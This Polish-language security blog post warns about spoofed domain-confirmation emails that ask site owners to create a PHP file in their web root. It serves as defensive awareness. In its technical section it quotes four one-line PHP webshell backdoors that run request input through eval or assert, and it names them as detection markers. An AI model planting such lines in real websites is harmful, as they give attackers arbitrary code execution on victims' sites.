Security Blog
Security Blog
Posted By Gregory

Nie ufaj tym fałszywym wiadomościom potwierdzającym domenę

Jeśli kiedykolwiek otrzymasz list z prośbą o utworzenie, pobranie lub zainstalowanie kodu PHP na Twojej stronie internetowej, musisz go zignorować


English version: Do not trust those fake domain confirmation emails


Ostatnio niektórzy z moich klientów otrzymali dziwne e-maile od swoich rejestratorów domen. Listy te zawierają prośbę o potwierdzenie domen własnych. Sprawdziłem jeden z tych listów i szybko zidentyfikowałem go jako fałszywy . Wszystkie litery mają identyczny wzór i prośbę o utworzenie pliku PHP w folderze głównym na stronie internetowej o określonej nazwie i podanej treści. Nie trzeba dodawać, że sugerowana zawartość tego pliku PHP zawiera złośliwy kod znany jako kod backdoora. Ten rodzaj kodu umożliwia atakującemu wykonanie dowolnej akcji na stronie internetowej ofiary.

Jeśli kiedykolwiek otrzymasz list z prośbą o utworzenie, pobranie lub zainstalowanie kodu PHP na Twojej stronie internetowej, musisz go zignorować. Bez wyjątków. Nawet jeśli list pochodzi od prezydenta lub twojej mamy.

Fałszywe listy wydają się uzasadnione z powodu legalnego adresu e-mail nadawcy . Ale to jest fałszowanie wiadomości e-mail. Nie spodziewasz się, że otrzymasz fałszywą wiadomość e-mail od znajomych lub rejestratora domeny. Prawidłowy? NIE! Każdy list e-mail może zawierać dowolny adres e-mail nadawcy. Zdecydowana większość serwerów pocztowych i klientów pocztowych nie sprawdza ani nie weryfikuje adresu nadawcy. Więc widzisz to tak, jak chciał haker. Nie wolno ufać żadnej wiadomości e-mail otrzymanej od znanego nadawcy, jeśli zawiera ona prośbę o wykonanie podejrzanej czynności, takiej jak zainstalowanie kodu w witrynie internetowej lub aplikacji na komputerze.

Szczegóły techniczne

Fałszywe e-maile zazwyczaj zawierają niektóre z poniższych linii PHP.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

FYI: base64_decode, eval i assert to dobrze znane znaczniki podejrzanego lub złośliwego kodu PHP.

Zobacz też: Inspektor wtyczek ujawnia problemy z bezpieczeństwem innych wtyczek


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.